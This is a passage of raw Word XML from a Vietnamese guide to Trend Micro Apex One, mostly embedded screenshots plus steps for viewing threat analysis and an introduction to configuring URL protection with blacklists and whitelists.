          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="004007DE" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E6558" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEC81D7" w14:textId="29D8C963" w:rsidR="008F10C3" w:rsidRPr="007D5E72" w:rsidRDefault="008F10C3" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F10C3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CB2958E" wp14:editId="1E49A75C">
            <wp:extent cx="5943600" cy="2829560"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="27940"/>
            <wp:docPr id="511270906" name="Picture 511270906"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0906" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, số, phần mềm&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2829560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="339C6BFC" w14:textId="1DE6D181" w:rsidR="000D74A1" w:rsidRPr="002F6166" w:rsidRDefault="00F543DF" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F543DF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="513814CE" wp14:editId="2E7EC23A">
            <wp:extent cx="5943600" cy="3140710"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="21590"/>
            <wp:docPr id="902813378" name="Picture 90281337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13378" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, số, Phông chữ&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3140710"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7F0199" w14:textId="01263490" w:rsidR="00F543DF" w:rsidRPr="007D5E72" w:rsidRDefault="00E44E8F" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44E8F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31BB3B86" wp14:editId="79F4482A">
            <wp:extent cx="5943600" cy="3131185"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="12065"/>
            <wp:docPr id="280937585" name="Picture 28093758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7585" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, số, Phông chữ&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3131185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FB2534" w14:textId="0B1EBA41" w:rsidR="00A739DF" w:rsidRPr="007D5E72" w:rsidRDefault="005D286E" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00005FFA" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">hreats analysis tại Dashboard </w:t>
      </w:r>
      <w:r w:rsidR="00E47823" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00867996" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00005FFA" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E47823" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Security Posture và click vào threats cần phân tích</w:t>
      </w:r>
      <w:r w:rsidR="00DA1005" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5037891D" w14:textId="66456CC2" w:rsidR="000D74A1" w:rsidRPr="002F6166" w:rsidRDefault="00E47823" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E47823">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="438CA8A3" wp14:editId="32C41789">
            <wp:extent cx="5943600" cy="2830830"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="26670"/>
            <wp:docPr id="941020048" name="Picture 94102004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048" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, phần mềm, Biểu tượng máy tính&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2830830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E79C437" w14:textId="6C052334" w:rsidR="00DA1005" w:rsidRPr="007D5E72" w:rsidRDefault="00B165D0" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B165D0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C246D0A" wp14:editId="704BC299">
            <wp:extent cx="5943600" cy="2825750"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="12700"/>
            <wp:docPr id="720617232" name="Picture 720617232"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7232" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, số, phần mềm&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2825750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4294E4A8" w14:textId="4B3F05AD" w:rsidR="00B165D0" w:rsidRPr="007D5E72" w:rsidRDefault="00D577AC" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D577AC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BC99F7B" wp14:editId="61A0F4D9">
            <wp:extent cx="5943600" cy="2830830"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="26670"/>
            <wp:docPr id="2061579740" name="Picture 206157974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9740" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, phần mềm, Biểu tượng máy tính&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2830830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7297EE57" w14:textId="44E3923F" w:rsidR="00684DFE" w:rsidRPr="007D5E72" w:rsidRDefault="00684DFE" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Click vào General Information để xem nhiều thông tin về threat hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2C3D2A" w14:textId="6A233790" w:rsidR="005136F3" w:rsidRPr="002F6166" w:rsidRDefault="005136F3" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005136F3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2230E8A9" wp14:editId="62B845E2">
            <wp:extent cx="5943600" cy="2834005"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="23495"/>
            <wp:docPr id="537455475" name="Picture 537455475"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5475" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, ảnh chụp màn hình, phần mềm, Trang web&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2834005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="592036EF" w14:textId="5915B6BD" w:rsidR="00F50FF1" w:rsidRDefault="00F50FF1" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Để xem </w:t>
      </w:r>
      <w:r w:rsidR="00C16F23" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">hreat </w:t>
      </w:r>
      <w:r w:rsidR="00C16F23" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="000949CE" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>onnect</w:t>
      </w:r>
      <w:r w:rsidR="003E4D87" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, click vào mục </w:t>
      </w:r>
      <w:r w:rsidR="000F1D76">
        <w:t>View more information on Threat Connect</w:t>
      </w:r>
      <w:r w:rsidR="009D3C6E">
        <w:t xml:space="preserve"> ở cuối trang.</w:t>
      </w:r>
      <w:r w:rsidR="0055735F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0055735F" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Đây là trang info về threat và những những hành động của threat đó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8B430C" w14:textId="7189A20A" w:rsidR="009D3C6E" w:rsidRPr="007D5E72" w:rsidRDefault="0055735F" w:rsidP="002F6166">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nếu threat</w:t>
      </w:r>
      <w:r w:rsidR="00FD44F6" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> đã có trên database của </w:t>
      </w:r>
      <w:r w:rsidR="00B23B0C" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trend Micro</w:t>
      </w:r>
      <w:r w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE0ECB" w:rsidRPr="007D5E72">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sẽ tiện lợi cho việc phân tích hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194E4554" w14:textId="104AB0D7" w:rsidR="00CE0ECB" w:rsidRPr="007D5E72" w:rsidRDefault="00CE27C2" w:rsidP="002F6166">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE27C2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1398C9CF" wp14:editId="73928623">
            <wp:extent cx="5943600" cy="2832735"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24765"/>
            <wp:docPr id="1896775344" name="Picture 1896775344" descr="Ảnh có chứa văn bản, phần mềm,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5344" name="Hình ảnh 1" descr="Ảnh có chứa văn bản, phần mềm, ảnh chụp màn hình, Trang web&#10;&#10;Mô tả được tạo tự động"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2832735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7493B80D" w14:textId="77777777" w:rsidR="00E31ADF" w:rsidRPr="009B73C7" w:rsidRDefault="00E31ADF" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc152795838"/>
      <w:r w:rsidRPr="009B73C7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Thử </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="009B73C7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>ghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="7A097AC8" w14:textId="70667401" w:rsidR="5C4FC012" w:rsidRDefault="00E60624" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc152795839"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Bảo vệ URL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="46E30416" w14:textId="61DBB78E" w:rsidR="79DCE274" w:rsidRPr="00777654" w:rsidRDefault="2C9A7E27" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc152795840"/>
      <w:r w:rsidRPr="00777654">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Giới thiệu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="4B6B4CD1" w14:textId="2C855058" w:rsidR="3543A34F" w:rsidRPr="00777654" w:rsidRDefault="280C03F3" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777654">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trong số nhiều tính năng bảo vệ mà Trend Micro Apex One cung cấp, URL protection (bảo vệ URL) là một khía cạnh quan trọng giúp ngăn chặn người dùng truy cập các trang web độc hại và tiềm ẩn nguy cơ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EF2290" w14:textId="3CE7DFFA" w:rsidR="79DCE274" w:rsidRDefault="79DCE274" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="59D7D5EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>URL protection của Trend Micro giúp ngăn chặn người dùng truy cập vào các trang web chứa mã độc hại, phishing, hoặc nơi tiềm ẩn các mối đe dọa mạng. Giải pháp này sử dụng danh sách đen (blacklists) và danh sách trắng (whitelists) để quản lý truy cập vào các trang web. Danh sách đen chứa các địa chỉ URL được xác định là độc hại, trong khi danh sách trắng bao gồm các trang web được phép.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BA8519" w14:textId="2DA1822A" w:rsidR="2C9A7E27" w:rsidRPr="00777654" w:rsidRDefault="2C9A7E27" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc152795841"/>
      <w:r w:rsidRPr="00777654">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hướng dẫn cài đặt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="01A17B65" w14:textId="2B867F83" w:rsidR="2C9A7E27" w:rsidRDefault="110663BA" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="59D7D5EB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Đăng nhập vào Bảng điều khiển (Console): Mở trình duyệt web và truy cập vào bảng điều khiển của Trend Micro Apex One.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534FBDB0" w14:textId="6DC8A836" w:rsidR="36FA1235" w:rsidRDefault="36FA1235" w:rsidP="00777654">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="36FA1235">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tiến hành truy cập vào </w:t>
      </w:r>
      <w:r w:rsidR="69402ACB" w:rsidRPr="69402ACB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Chính sách (Policies) </w:t>
      </w:r>
      <w:r w:rsidR="38F8946E" w:rsidRPr="38F8946E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>và chọn sản phẩm (</w:t>
      </w:r>
      <w:r w:rsidR="4DC9CB47" w:rsidRPr="4DC9CB47">
        <w:rPr>
